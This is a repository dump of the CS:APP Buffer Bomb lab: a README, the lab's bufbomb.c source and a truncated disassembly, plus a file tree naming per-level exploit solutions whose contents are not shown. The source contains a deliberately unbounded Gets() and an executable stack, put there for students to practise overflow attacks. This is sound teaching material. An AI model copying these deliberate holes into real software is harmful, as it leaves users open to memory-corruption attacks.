├── ICS-LAB3实验指导书.docx ├── README.md ├── bufbomb ├── bufbomb.c ├── bufbomb_-D.s ├── bufbomb_-d.s ├── buflab-handout.tar ├── buflab.pdf ├── hex2raw ├── level0_smoke └── smoke_U201315075.txt ├── level1_fizz └── fizz_U201315075.txt ├── level2_bang ├── bang.o ├── bang.s └── bang_U201315075.txt ├── level3_bomb ├── bomb.o ├── bomb.s ├── bomb2.o ├── bomb2.s ├── bomb2_U201315075.txt └── bomb_U201315075.txt ├── level4_nitro ├── nitro.o ├── nitro.s └── nitro_U201315075.txt └── makecookie /ICS-LAB3实验指导书.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/ICS-LAB3实验指导书.docx -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Introduction 2 | 3 | This [assignment](https://github.com/zhwhong/Bufbomb_CSAPP/blob/master/buflab.pdf) will help you develop a detailed understanding of IA-32 calling conventions and stack 4 | organization. It involves applying a series of buffer overflow attacks on an executable file bufbomb in the 5 | lab directory. 6 | 7 | 详细实验过程和步骤见个人博客[Bufbomb缓冲区溢出攻击实验详解-CSAPP](http://zhwhong.cn/2017/05/29/buffer-overflow-attack/)或[简书](http://www.jianshu.com/p/dc41c84cef17)。 8 | 9 | ## Assignment 10 | 11 | - Computer Systems, Spring 2017 12 | - Lab Assignment 3: The Buffer Bomb 13 | - Assigned: Apr. 20 14 | 15 | ## Reference 16 | 17 | - [[My Blog] Bufbomb缓冲区溢出攻击实验详解-CSAPP](http://zhwhong.cn/2017/05/29/buffer-overflow-attack/) 18 | - [[简书] Bufbomb缓冲区溢出攻击实验详解](http://www.jianshu.com/p/dc41c84cef17) - [zhwhong](http://www.jianshu.com/u/38cd2a8c425e) 19 | - [[pdf] buflab assignment](https://github.com/zhwhong/Bufbomb_CSAPP/blob/master/buflab.pdf) 20 | - [[docx] ICS-LAB3实验指导书](https://github.com/zhwhong/Bufbomb_CSAPP/blob/master/ICS-LAB3%E5%AE%9E%E9%AA%8C%E6%8C%87%E5%AF%BC%E4%B9%A6.docx) 21 | - [CSAPP 3e Attack lab](http://blog.csdn.net/lijun538/article/details/50682387) 22 | - [Bufbomb Lab 缓冲区溢出攻击试验(Buffer Lab)](http://blog.sina.com.cn/s/blog_65eb367a0101exfa.html) 23 | - [bufbomb实验心得及详细步骤](http://blog.csdn.net/q1w2e3r4470/article/details/44976755) 24 | - [CSAPP实验四-缓冲区溢出实验bufbomb](http://m.blog.csdn.net/article/details?id=51500830) 25 | -------------------------------------------------------------------------------- /bufbomb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/bufbomb -------------------------------------------------------------------------------- /bufbomb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * bufbomb.c - Bomb program that is solved using a buffer overflow attack 3 | * 4 | * Copyright (c) 2002-2011, R. Bryant and D. O'Hallaron, All rights reserved. 5 | */ 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include "support.h" 13 | #include "gencookie.h" 14 | #include "stack.h" 15 | 16 | /* 17 | * This version of bufbomb uses mmap() to shift the stack to a stable 18 | * location, regardless of any stack randomization by the runtime system. 19 | */ 20 | #ifndef USE_MMAP 21 | #define USE_MMAP 22 | #endif 23 | 24 | /* The "bottom" of the shifted stack will be at this address. This 25 | * location works on every Linux system we've tried it on over a 26 | * period of years. */ 27 | #ifdef USE_MMAP 28 | #include 29 | #endif 30 | 31 | /* Included for historical reasons. Better to run a VirtualBox Ubuntu 32 | Linux VM on your PC or Mac than to use Cygwin */ 33 | #ifdef __CYGWIN__ 34 | #include "getopt.h" 35 | #endif 36 | 37 | /* Binary code for HLT (halt) instruction */ 38 | #define HALT_INSTR 0xF4 39 | 40 | /* Levels 0-3 are called once */ 41 | #define NORMAL_CNT 1 42 | /* $begin getbuf-c */ 43 | /* Buffer size for getbuf */ 44 | #define NORMAL_BUFFER_SIZE 32 45 | 46 | /* $end getbuf-c */ 47 | /* Level 4 (nitro mode) is called multiple times */ 48 | #define KABOOM_CNT 5 49 | /* $begin kaboom-c */ 50 | /* Buffer size for getbufn */ 51 | #define KABOOM_BUFFER_SIZE 512 52 | 53 | /* $end kaboom-c */ 54 | /* Global variables */ 55 | char *userid = NULL; /* user id [set by -u] */ 56 | int notify = 0; /* if true, send exploits to grading server [set by -s] */ 57 | int autograde = 0; /* if true, run in autograde mode with timeout [set by -g]*/ 58 | 59 | FILE *infile = NULL; /* always stdin */ 60 | unsigned cookie = 0; /* unique cookie computed from userid */ 61 | int success = 0; /* set by validate() to indicate successful exploit */ 62 | 63 | /* Function prototypes */ 64 | void validate(int); 65 | char *Gets(char *); 66 | int getbuf(); 67 | int getbufn(); 68 | int uniqueval(); 69 | 70 | /* 71 | * The following is the part of the code students will actually look 72 | * at. They are put at the beginning of the file to make them easier 73 | * to find in the diassembly, and to make their locations more stable 74 | * when other parts of the code get modified. 75 | */ 76 | 77 | /* 78 | * smoke - On return from getbuf(), the level 0 exploit executes 79 | * the code for smoke() instead of returning to test(). 80 | */ 81 | /* $begin smoke-c */ 82 | void smoke() 83 | { 84 | printf("Smoke!: You called smoke()\n"); 85 | validate(0); 86 | exit(0); 87 | } 88 | /* $end smoke-c */ 89 | 90 | /* 91 | * fizz - On return from getbuf(), the level 1 exploit executes the 92 | * code for fizz() instead of returning to test(), and makes it appear 93 | * that fizz() was passed the users's unique cookie as the argument. 94 | */ 95 | /* $begin fizz-c */ 96 | void fizz(int val) 97 | { 98 | if (val == cookie) { 99 | printf("Fizz!: You called fizz(0x%x)\n", val); 100 | validate(1); 101 | 102 | } else 103 | printf("Misfire: You called fizz(0x%x)\n", val); 104 | exit(0); 105 | } 106 | /* $end fizz-c */ 107 | 108 | /* 109 | * bang - On return from getbuf(), the level 2 exploit executes the 110 | * code for bang() instead of returning to test(). Before transferring 111 | * control, it must execute code on the stack that sets a global 112 | * variable to the user's cookie. 113 | */ 114 | /* $begin bang-c */ 115 | int global_value = 0; 116 | 117 | void bang(int val) 118 | { 119 | if (global_value == cookie) { 120 | printf("Bang!: You set global_value to 0x%x\n", global_value); 121 | validate(2); 122 | } else 123 | printf("Misfire: global_value = 0x%x\n", global_value); 124 | exit(0); 125 | } 126 | /* $end bang-c */ 127 | 128 | /* 129 | * test - This function calls the function with the buffer overflow 130 | * bug. The exploits for levels 0-2 return from the getbuf() call to a 131 | * different function, which then immediately exits. The level 3 132 | * exploit must return to test() with local variable val set to the 133 | * user's cookie. This is tricky because, unlike the previous levels, 134 | * which simply transferred control, the exploit code must restore the 135 | * stack to support a proper return. 136 | */ 137 | /* $begin boom-c */ 138 | void test() 139 | { 140 | int val; 141 | /* Put canary on stack to detect possible corruption */ 142 | volatile int local = uniqueval(); 143 | 144 | val = getbuf(); 145 | 146 | /* Check for corrupted stack */ 147 | if (local != uniqueval()) { 148 | printf("Sabotaged!: the stack has been corrupted\n"); 149 | } 150 | else if (val == cookie) { 151 | printf("Boom!: getbuf returned 0x%x\n", val); 152 | validate(3); 153 | } else { 154 | printf("Dud: getbuf returned 0x%x\n", val); 155 | } 156 | } 157 | /* $end boom-c */ 158 | 159 | 160 | /* 161 | * testn - Calls the function with the buffer overflow bug exploited 162 | * by the level 4 exploit. 163 | */ 164 | void testn() 165 | { 166 | int val; 167 | volatile int local = uniqueval(); 168 | 169 | val = getbufn(); 170 | 171 | /* Check for corrupted stack */ 172 | if (local != uniqueval()) { 173 | printf("Sabotaged!: the stack has been corrupted\n"); 174 | } 175 | else if (val == cookie) { 176 | printf("KABOOM!: getbufn returned 0x%x\n", val); 177 | validate(4); 178 | } 179 | else { 180 | printf("Dud: getbufn returned 0x%x\n", val); 181 | } 182 | } 183 | 184 | /****************** 185 | * Helper functions 186 | ******************/ 187 | 188 | /* 189 | * Gets - Like gets(), except that can optionally (when hexformat 190 | * nonzero) accept format where characters are typed as pairs of hex 191 | * digits. Nondigit characters are ignored. Stops when encounters 192 | * newline. In addition, it stores the string in global buffer 193 | * gets_buf. 194 | */ 195 | #define GETLEN 1024 196 | 197 | int gets_cnt = 0; 198 | char gets_buf[3*GETLEN+1]; 199 | 200 | static char trans_char[16] = 201 | {'0', '1', '2', '3', '4', '5', '6', '7', 202 | '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'}; 203 | 204 | static void save_char(char c) { 205 | if (gets_cnt < GETLEN) { 206 | gets_buf[3*gets_cnt] = trans_char[(c>>4)&0xF]; 207 | gets_buf[3*gets_cnt+1] = trans_char[c&0xF]; 208 | gets_buf[3*gets_cnt+2] = ' '; 209 | gets_cnt++; 210 | } 211 | } 212 | 213 | static void save_term() 214 | { 215 | gets_buf[3*gets_cnt] = '\0'; 216 | } 217 | 218 | char *Gets(char *dest) 219 | { 220 | int c; 221 | char *sp = dest; 222 | 223 | gets_cnt = 0; 224 | 225 | while ((c = getc(infile)) != EOF && c != '\n') { 226 | *sp++ = c; 227 | save_char(c); 228 | } 229 | 230 | *sp++ = '\0'; 231 | save_term(); 232 | return dest; 233 | } 234 | 235 | 236 | /* 237 | * usage - prints usage information 238 | */ 239 | static void usage(char *name) 240 | { 241 | printf("Usage: %s -u [-nsh]\n", name); 242 | printf(" -u User ID\n"); 243 | printf(" -n Nitro mode\n"); 244 | printf(" -s Submit your solution to the grading server\n"); 245 | printf(" -h Print help information\n"); 246 | exit(0); 247 | } 248 | 249 | /* 250 | * Signal handlers for bus errors, seg faults, and illegal instruction 251 | * faults 252 | */ 253 | void bushandler(int sig) 254 | { 255 | printf("Crash!: You caused a bus error!\n"); 256 | printf("Better luck next time\n"); 257 | exit(0); 258 | } 259 | 260 | void seghandler(int sig) 261 | { 262 | printf("Ouch!: You caused a segmentation fault!\n"); 263 | printf("Better luck next time\n"); 264 | exit(0); 265 | } 266 | 267 | void illegalhandler(int sig) 268 | { 269 | printf("Oops!: You executed an illegal instruction\n"); 270 | printf("Better luck next time\n"); 271 | exit(0); 272 | } 273 | 274 | /* 275 | * launch - Calls either test (normal mode) or testn (nitro mode) 276 | */ 277 | static void launch(int nitro, int offset) 278 | { 279 | int localbuf[16]; 280 | size_t stable_tweak = 0; 281 | int *space; 282 | /* 283 | * This little hack adjusts the stack. Without it, the stack 284 | * offset is different when the program is executed in the shell 285 | * and when it is executed in gdb. For normal mode, it tries to 286 | * put it into a stable position from one run to the next. In 287 | * nitro mode, it makes it even less stable than it would normally 288 | * be. You don't need to understand it to do the assignment. 289 | */ 290 | stable_tweak = (((size_t) localbuf) & 0x3FF0); 291 | space = (int *) alloca(stable_tweak + offset); 292 | 293 | /* Fill full of halt instructions, so that will get seg fault */ 294 | memset(space, HALT_INSTR, stable_tweak); 295 | 296 | /* Call the appropriate function */ 297 | printf("Type string:"); 298 | if (nitro) 299 | testn(); 300 | else 301 | test(); 302 | if (!success) { 303 | printf("Better luck next time\n"); 304 | success = 0; 305 | } 306 | } 307 | 308 | 309 | /* 310 | * launcher - New version of the launching code that uses mmap() to 311 | * generate a stable stack position, regardless of any stack randomization 312 | * used by the runtime system. 313 | */ 314 | 315 | /* Must put context information in global vars, since stack will get 316 | messed up */ 317 | int global_nitro = 0; 318 | int global_offset = 0; 319 | volatile void *stack_top; 320 | volatile void *global_save_stack = NULL; 321 | 322 | 323 | void launcher(int nitro, int offset) 324 | { 325 | #ifdef USE_MMAP 326 | void *new_stack; 327 | #endif 328 | 329 | /* Assign from stack to globals before we move the stack location */ 330 | global_nitro = nitro; 331 | global_offset = offset; 332 | 333 | #ifdef USE_MMAP 334 | new_stack = mmap(START_ADDR, STACK_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE, 335 | MAP_PRIVATE | MAP_GROWSDOWN | MAP_ANONYMOUS | MAP_FIXED, 336 | 0, 0); 337 | if (new_stack != START_ADDR) { 338 | fprintf(stderr, "Internal error. Couldn't use mmap. Try different value for START_ADDR\n"); 339 | exit(1); 340 | } 341 | stack_top = new_stack + STACK_SIZE - 8; 342 | asm("movl %%esp,%%eax ; movl %1,%%esp ; movl %%eax,%0" 343 | : "=r" (global_save_stack) 344 | : "r" (stack_top) 345 | : "%eax" 346 | ); 347 | #endif 348 | 349 | launch(global_nitro, global_offset); 350 | 351 | 352 | #ifdef USE_MMAP 353 | asm("movl %0,%%esp" 354 | : 355 | : "r" (global_save_stack) 356 | ); 357 | munmap(new_stack, STACK_SIZE); 358 | #endif 359 | } 360 | 361 | /* 362 | * uniqueval - Compute random value that will change from one execution to the next 363 | */ 364 | int uniqueval(){ 365 | srandom(getpid()); 366 | return random(); 367 | } 368 | 369 | 370 | /* 371 | * main - The main routine 372 | */ 373 | int main(int argc, char *argv[]) 374 | { 375 | int cookie_tweak = 0; 376 | int nitro = 0; /* Run in unstable mode? */ 377 | int i; 378 | int *offsets; 379 | int cnt = NORMAL_CNT; /* By default, call launcher once */ 380 | char c; 381 | 382 | /* Install handlers for the inevitable faults */ 383 | signal(SIGSEGV, seghandler); 384 | signal(SIGBUS, bushandler); 385 | signal(SIGILL, illegalhandler); 386 | 387 | /* Parse command line arguments */ 388 | infile = stdin; 389 | while ((c = getopt(argc, argv, "gsnhu:")) != -1) 390 | switch(c) { 391 | case 'h': /* print help info */ 392 | usage(argv[0]); 393 | break; 394 | case 'n': /* run in nitro mode */ 395 | nitro = 1; 396 | cnt = KABOOM_CNT; /* Call launcher multiple times */ 397 | break; 398 | case 'u': /* userid */ 399 | userid = strdup(optarg); 400 | cookie = gencookie(userid); 401 | break; 402 | case 's': /* submit exploit string to the grading server */ 403 | if (!NOTIFY) 404 | printf("This is a quiet bomb. Ignoring -s flag.\n"); 405 | notify = NOTIFY; 406 | break; 407 | case 'g': /* autograding mode, sets timeout */ 408 | autograde = 1; 409 | break; 410 | default: 411 | usage(argv[0]); 412 | } 413 | 414 | /* Userid is a required argument */ 415 | if (!userid) { 416 | printf("%s: Missing required argument (-u : 8 | 804873c: 53 push %ebx 9 | 804873d: 83 ec 08 sub $0x8,%esp 10 | 8048740: e8 6b 02 00 00 call 80489b0 <__x86.get_pc_thunk.bx> 11 | 8048745: 81 c3 bb 38 00 00 add $0x38bb,%ebx 12 | 804874b: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax 13 | 8048751: 85 c0 test %eax,%eax 14 | 8048753: 74 05 je 804875a <_init+0x1e> 15 | 8048755: e8 e6 00 00 00 call 8048840 <__gmon_start__@plt> 16 | 804875a: 83 c4 08 add $0x8,%esp 17 | 804875d: 5b pop %ebx 18 | 804875e: c3 ret 19 | 20 | Disassembly of section .plt: 21 | 22 | 08048760 : 23 | 8048760: ff 35 04 c0 04 08 pushl 0x804c004 24 | 8048766: ff 25 08 c0 04 08 jmp *0x804c008 25 | 804876c: 00 00 add %al,(%eax) 26 | ... 27 | 28 | 08048770 : 29 | 8048770: ff 25 0c c0 04 08 jmp *0x804c00c 30 | 8048776: 68 00 00 00 00 push $0x0 31 | 804877b: e9 e0 ff ff ff jmp 8048760 <_init+0x24> 32 | 33 | 08048780 : 34 | 8048780: ff 25 10 c0 04 08 jmp *0x804c010 35 | 8048786: 68 08 00 00 00 push $0x8 36 | 804878b: e9 d0 ff ff ff jmp 8048760 <_init+0x24> 37 | 38 | 08048790 : 39 | 8048790: ff 25 14 c0 04 08 jmp *0x804c014 40 | 8048796: 68 10 00 00 00 push $0x10 41 | 804879b: e9 c0 ff ff ff jmp 8048760 <_init+0x24> 42 | 43 | 080487a0 : 44 | 80487a0: ff 25 18 c0 04 08 jmp *0x804c018 45 | 80487a6: 68 18 00 00 00 push $0x18 46 | 80487ab: e9 b0 ff ff ff jmp 8048760 <_init+0x24> 47 | 48 | 080487b0 : 49 | 80487b0: ff 25 1c c0 04 08 jmp *0x804c01c 50 | 80487b6: 68 20 00 00 00 push $0x20 51 | 80487bb: e9 a0 ff ff ff jmp 8048760 <_init+0x24> 52 | 53 | 080487c0 : 54 | 80487c0: ff 25 20 c0 04 08 jmp *0x804c020 55 | 80487c6: 68 28 00 00 00 push $0x28 56 | 80487cb: e9 90 ff ff ff jmp 8048760 <_init+0x24> 57 | 58 | 080487d0 <_IO_getc@plt>: 59 | 80487d0: ff 25 24 c0 04 08 jmp *0x804c024 60 | 80487d6: 68 30 00 00 00 push $0x30 61 | 80487db: e9 80 ff ff ff jmp 8048760 <_init+0x24> 62 | 63 | 080487e0 : 64 | 80487e0: ff 25 28 c0 04 08 jmp *0x804c028 65 | 80487e6: 68 38 00 00 00 push $0x38 66 | 80487eb: e9 70 ff ff ff jmp 8048760 <_init+0x24> 67 | 68 | 080487f0 : 69 | 80487f0: ff 25 2c c0 04 08 jmp *0x804c02c 70 | 80487f6: 68 40 00 00 00 push $0x40 71 | 80487fb: e9 60 ff ff ff jmp 8048760 <_init+0x24> 72 | 73 | 08048800 : 74 | 8048800: ff 25 30 c0 04 08 jmp *0x804c030 75 | 8048806: 68 48 00 00 00 push $0x48 76 | 804880b: e9 50 ff ff ff jmp 8048760 <_init+0x24> 77 | 78 | 08048810 : 79 | 8048810: ff 25 34 c0 04 08 jmp *0x804c034 80 | 8048816: 68 50 00 00 00 push $0x50 81 | 804881b: e9 40 ff ff ff jmp 8048760 <_init+0x24> 82 | 83 | 08048820 : 84 | 8048820: ff 25 38 c0 04 08 jmp *0x804c038 85 | 8048826: 68 58 00 00 00 push $0x58 86 | 804882b: e9 30 ff ff ff jmp 8048760 <_init+0x24> 87 | 88 | 08048830 : 89 | 8048830: ff 25 3c c0 04 08 jmp *0x804c03c 90 | 8048836: 68 60 00 00 00 push $0x60 91 | 804883b: e9 20 ff ff ff jmp 8048760 <_init+0x24> 92 | 93 | 08048840 <__gmon_start__@plt>: 94 | 8048840: ff 25 40 c0 04 08 jmp *0x804c040 95 | 8048846: 68 68 00 00 00 push $0x68 96 | 804884b: e9 10 ff ff ff jmp 8048760 <_init+0x24> 97 | 98 | 08048850 : 99 | 8048850: ff 25 44 c0 04 08 jmp *0x804c044 100 | 8048856: 68 70 00 00 00 push $0x70 101 | 804885b: e9 00 ff ff ff jmp 8048760 <_init+0x24> 102 | 103 | 08048860 : 104 | 8048860: ff 25 48 c0 04 08 jmp *0x804c048 105 | 8048866: 68 78 00 00 00 push $0x78 106 | 804886b: e9 f0 fe ff ff jmp 8048760 <_init+0x24> 107 | 108 | 08048870 : 109 | 8048870: ff 25 4c c0 04 08 jmp *0x804c04c 110 | 8048876: 68 80 00 00 00 push $0x80 111 | 804887b: e9 e0 fe ff ff jmp 8048760 <_init+0x24> 112 | 113 | 08048880 <__libc_start_main@plt>: 114 | 8048880: ff 25 50 c0 04 08 jmp *0x804c050 115 | 8048886: 68 88 00 00 00 push $0x88 116 | 804888b: e9 d0 fe ff ff jmp 8048760 <_init+0x24> 117 | 118 | 08048890 : 119 | 8048890: ff 25 54 c0 04 08 jmp *0x804c054 120 | 8048896: 68 90 00 00 00 push $0x90 121 | 804889b: e9 c0 fe ff ff jmp 8048760 <_init+0x24> 122 | 123 | 080488a0 : 124 | 80488a0: ff 25 58 c0 04 08 jmp *0x804c058 125 | 80488a6: 68 98 00 00 00 push $0x98 126 | 80488ab: e9 b0 fe ff ff jmp 8048760 <_init+0x24> 127 | 128 | 080488b0 <__isoc99_sscanf@plt>: 129 | 80488b0: ff 25 5c c0 04 08 jmp *0x804c05c 130 | 80488b6: 68 a0 00 00 00 push $0xa0 131 | 80488bb: e9 a0 fe ff ff jmp 8048760 <_init+0x24> 132 | 133 | 080488c0 : 134 | 80488c0: ff 25 60 c0 04 08 jmp *0x804c060 135 | 80488c6: 68 a8 00 00 00 push $0xa8 136 | 80488cb: e9 90 fe ff ff jmp 8048760 <_init+0x24> 137 | 138 | 080488d0 <__strdup@plt>: 139 | 80488d0: ff 25 64 c0 04 08 jmp *0x804c064 140 | 80488d6: 68 b0 00 00 00 push $0xb0 141 | 80488db: e9 80 fe ff ff jmp 8048760 <_init+0x24> 142 | 143 | 080488e0 <__errno_location@plt>: 144 | 80488e0: ff 25 68 c0 04 08 jmp *0x804c068 145 | 80488e6: 68 b8 00 00 00 push $0xb8 146 | 80488eb: e9 70 fe ff ff jmp 8048760 <_init+0x24> 147 | 148 | 080488f0 : 149 | 80488f0: ff 25 6c c0 04 08 jmp *0x804c06c 150 | 80488f6: 68 c0 00 00 00 push $0xc0 151 | 80488fb: e9 60 fe ff ff jmp 8048760 <_init+0x24> 152 | 153 | 08048900 : 154 | 8048900: ff 25 70 c0 04 08 jmp *0x804c070 155 | 8048906: 68 c8 00 00 00 push $0xc8 156 | 804890b: e9 50 fe ff ff jmp 8048760 <_init+0x24> 157 | 158 | 08048910 : 159 | 8048910: ff 25 74 c0 04 08 jmp *0x804c074 160 | 8048916: 68 d0 00 00 00 push $0xd0 161 | 804891b: e9 40 fe ff ff jmp 8048760 <_init+0x24> 162 | 163 | 08048920 : 164 | 8048920: ff 25 78 c0 04 08 jmp *0x804c078 165 | 8048926: 68 d8 00 00 00 push $0xd8 166 | 804892b: e9 30 fe ff ff jmp 8048760 <_init+0x24> 167 | 168 | 08048930 : 169 | 8048930: ff 25 7c c0 04 08 jmp *0x804c07c 170 | 8048936: 68 e0 00 00 00 push $0xe0 171 | 804893b: e9 20 fe ff ff jmp 8048760 <_init+0x24> 172 | 173 | 08048940 : 174 | 8048940: ff 25 80 c0 04 08 jmp *0x804c080 175 | 8048946: 68 e8 00 00 00 push $0xe8 176 | 804894b: e9 10 fe ff ff jmp 8048760 <_init+0x24> 177 | 178 | 08048950 : 179 | 8048950: ff 25 84 c0 04 08 jmp *0x804c084 180 | 8048956: 68 f0 00 00 00 push $0xf0 181 | 804895b: e9 00 fe ff ff jmp 8048760 <_init+0x24> 182 | 183 | 08048960 : 184 | 8048960: ff 25 88 c0 04 08 jmp *0x804c088 185 | 8048966: 68 f8 00 00 00 push $0xf8 186 | 804896b: e9 f0 fd ff ff jmp 8048760 <_init+0x24> 187 | 188 | 08048970 : 189 | 8048970: ff 25 8c c0 04 08 jmp *0x804c08c 190 | 8048976: 68 00 01 00 00 push $0x100 191 | 804897b: e9 e0 fd ff ff jmp 8048760 <_init+0x24> 192 | 193 | Disassembly of section .text: 194 | 195 | 08048980 <_start>: 196 | 8048980: 31 ed xor %ebp,%ebp 197 | 8048982: 5e pop %esi 198 | 8048983: 89 e1 mov %esp,%ecx 199 | 8048985: 83 e4 f0 and $0xfffffff0,%esp 200 | 8048988: 50 push %eax 201 | 8048989: 54 push %esp 202 | 804898a: 52 push %edx 203 | 804898b: 68 b0 9e 04 08 push $0x8049eb0 204 | 8048990: 68 40 9e 04 08 push $0x8049e40 205 | 8048995: 51 push %ecx 206 | 8048996: 56 push %esi 207 | 8048997: 68 da 8e 04 08 push $0x8048eda 208 | 804899c: e8 df fe ff ff call 8048880 <__libc_start_main@plt> 209 | 80489a1: f4 hlt 210 | 80489a2: 66 90 xchg %ax,%ax 211 | 80489a4: 66 90 xchg %ax,%ax 212 | 80489a6: 66 90 xchg %ax,%ax 213 | 80489a8: 66 90 xchg %ax,%ax 214 | 80489aa: 66 90 xchg %ax,%ax 215 | 80489ac: 66 90 xchg %ax,%ax 216 | 80489ae: 66 90 xchg %ax,%ax 217 | 218 | 080489b0 <__x86.get_pc_thunk.bx>: 219 | 80489b0: 8b 1c 24 mov (%esp),%ebx 220 | 80489b3: c3 ret 221 | 80489b4: 66 90 xchg %ax,%ax 222 | 80489b6: 66 90 xchg %ax,%ax 223 | 80489b8: 66 90 xchg %ax,%ax 224 | 80489ba: 66 90 xchg %ax,%ax 225 | 80489bc: 66 90 xchg %ax,%ax 226 | 80489be: 66 90 xchg %ax,%ax 227 | 228 | 080489c0 : 229 | 80489c0: b8 e3 d0 04 08 mov $0x804d0e3,%eax 230 | 80489c5: 2d e0 d0 04 08 sub $0x804d0e0,%eax 231 | 80489ca: 83 f8 06 cmp $0x6,%eax 232 | 80489cd: 77 01 ja 80489d0 233 | 80489cf: c3 ret 234 | 80489d0: b8 00 00 00 00 mov $0x0,%eax 235 | 80489d5: 85 c0 test %eax,%eax 236 | 80489d7: 74 f6 je 80489cf 237 | 80489d9: 55 push %ebp 238 | 80489da: 89 e5 mov %esp,%ebp 239 | 80489dc: 83 ec 18 sub $0x18,%esp 240 | 80489df: c7 04 24 e0 d0 04 08 movl $0x804d0e0,(%esp) 241 | 80489e6: ff d0 call *%eax 242 | 80489e8: c9 leave 243 | 80489e9: c3 ret 244 | 80489ea: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 245 | 246 | 080489f0 : 247 | 80489f0: b8 e0 d0 04 08 mov $0x804d0e0,%eax 248 | 80489f5: 2d e0 d0 04 08 sub $0x804d0e0,%eax 249 | 80489fa: c1 f8 02 sar $0x2,%eax 250 | 80489fd: 89 c2 mov %eax,%edx 251 | 80489ff: c1 ea 1f shr $0x1f,%edx 252 | 8048a02: 01 d0 add %edx,%eax 253 | 8048a04: d1 f8 sar %eax 254 | 8048a06: 75 01 jne 8048a09 255 | 8048a08: c3 ret 256 | 8048a09: ba 00 00 00 00 mov $0x0,%edx 257 | 8048a0e: 85 d2 test %edx,%edx 258 | 8048a10: 74 f6 je 8048a08 259 | 8048a12: 55 push %ebp 260 | 8048a13: 89 e5 mov %esp,%ebp 261 | 8048a15: 83 ec 18 sub $0x18,%esp 262 | 8048a18: 89 44 24 04 mov %eax,0x4(%esp) 263 | 8048a1c: c7 04 24 e0 d0 04 08 movl $0x804d0e0,(%esp) 264 | 8048a23: ff d2 call *%edx 265 | 8048a25: c9 leave 266 | 8048a26: c3 ret 267 | 8048a27: 89 f6 mov %esi,%esi 268 | 8048a29: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 269 | 270 | 08048a30 <__do_global_dtors_aux>: 271 | 8048a30: 80 3d ec d0 04 08 00 cmpb $0x0,0x804d0ec 272 | 8048a37: 75 13 jne 8048a4c <__do_global_dtors_aux+0x1c> 273 | 8048a39: 55 push %ebp 274 | 8048a3a: 89 e5 mov %esp,%ebp 275 | 8048a3c: 83 ec 08 sub $0x8,%esp 276 | 8048a3f: e8 7c ff ff ff call 80489c0 277 | 8048a44: c6 05 ec d0 04 08 01 movb $0x1,0x804d0ec 278 | 8048a4b: c9 leave 279 | 8048a4c: f3 c3 repz ret 280 | 8048a4e: 66 90 xchg %ax,%ax 281 | 282 | 08048a50 : 283 | 8048a50: a1 10 bf 04 08 mov 0x804bf10,%eax 284 | 8048a55: 85 c0 test %eax,%eax 285 | 8048a57: 74 1f je 8048a78 286 | 8048a59: b8 00 00 00 00 mov $0x0,%eax 287 | 8048a5e: 85 c0 test %eax,%eax 288 | 8048a60: 74 16 je 8048a78 289 | 8048a62: 55 push %ebp 290 | 8048a63: 89 e5 mov %esp,%ebp 291 | 8048a65: 83 ec 18 sub $0x18,%esp 292 | 8048a68: c7 04 24 10 bf 04 08 movl $0x804bf10,(%esp) 293 | 8048a6f: ff d0 call *%eax 294 | 8048a71: c9 leave 295 | 8048a72: e9 79 ff ff ff jmp 80489f0 296 | 8048a77: 90 nop 297 | 8048a78: e9 73 ff ff ff jmp 80489f0 298 | 8048a7d: 66 90 xchg %ax,%ax 299 | 8048a7f: 90 nop 300 | 301 | 08048a80 : 302 | 8048a80: 55 push %ebp 303 | 8048a81: 89 e5 mov %esp,%ebp 304 | 8048a83: 83 ec 18 sub $0x18,%esp 305 | 8048a86: c7 04 24 d4 9e 04 08 movl $0x8049ed4,(%esp) 306 | 8048a8d: e8 9e fd ff ff call 8048830 307 | 8048a92: c7 04 24 b4 a0 04 08 movl $0x804a0b4,(%esp) 308 | 8048a99: e8 92 fd ff ff call 8048830 309 | 8048a9e: c7 04 24 00 00 00 00 movl $0x0,(%esp) 310 | 8048aa5: e8 a6 fd ff ff call 8048850 311 | 312 | 08048aaa : 313 | 8048aaa: 55 push %ebp 314 | 8048aab: 89 e5 mov %esp,%ebp 315 | 8048aad: 83 ec 18 sub $0x18,%esp 316 | 8048ab0: c7 04 24 f4 9e 04 08 movl $0x8049ef4,(%esp) 317 | 8048ab7: e8 74 fd ff ff call 8048830 318 | 8048abc: c7 04 24 b4 a0 04 08 movl $0x804a0b4,(%esp) 319 | 8048ac3: e8 68 fd ff ff call 8048830 320 | 8048ac8: c7 04 24 00 00 00 00 movl $0x0,(%esp) 321 | 8048acf: e8 7c fd ff ff call 8048850 322 | 323 | 08048ad4 : 324 | 8048ad4: 55 push %ebp 325 | 8048ad5: 89 e5 mov %esp,%ebp 326 | 8048ad7: 83 ec 18 sub $0x18,%esp 327 | 8048ada: c7 04 24 1c 9f 04 08 movl $0x8049f1c,(%esp) 328 | 8048ae1: e8 4a fd ff ff call 8048830 329 | 8048ae6: c7 04 24 b4 a0 04 08 movl $0x804a0b4,(%esp) 330 | 8048aed: e8 3e fd ff ff call 8048830 331 | 8048af2: c7 04 24 00 00 00 00 movl $0x0,(%esp) 332 | 8048af9: e8 52 fd ff ff call 8048850 333 | 334 | 08048afe : 335 | 8048afe: 55 push %ebp 336 | 8048aff: 89 e5 mov %esp,%ebp 337 | 8048b01: 83 ec 18 sub $0x18,%esp 338 | 8048b04: 89 44 24 04 mov %eax,0x4(%esp) 339 | 8048b08: c7 04 24 ca a0 04 08 movl $0x804a0ca,(%esp) 340 | 8048b0f: e8 7c fc ff ff call 8048790 341 | 8048b14: c7 04 24 e8 a0 04 08 movl $0x804a0e8,(%esp) 342 | 8048b1b: e8 10 fd ff ff call 8048830 343 | 8048b20: c7 04 24 fe a0 04 08 movl $0x804a0fe,(%esp) 344 | 8048b27: e8 04 fd ff ff call 8048830 345 | 8048b2c: c7 04 24 48 9f 04 08 movl $0x8049f48,(%esp) 346 | 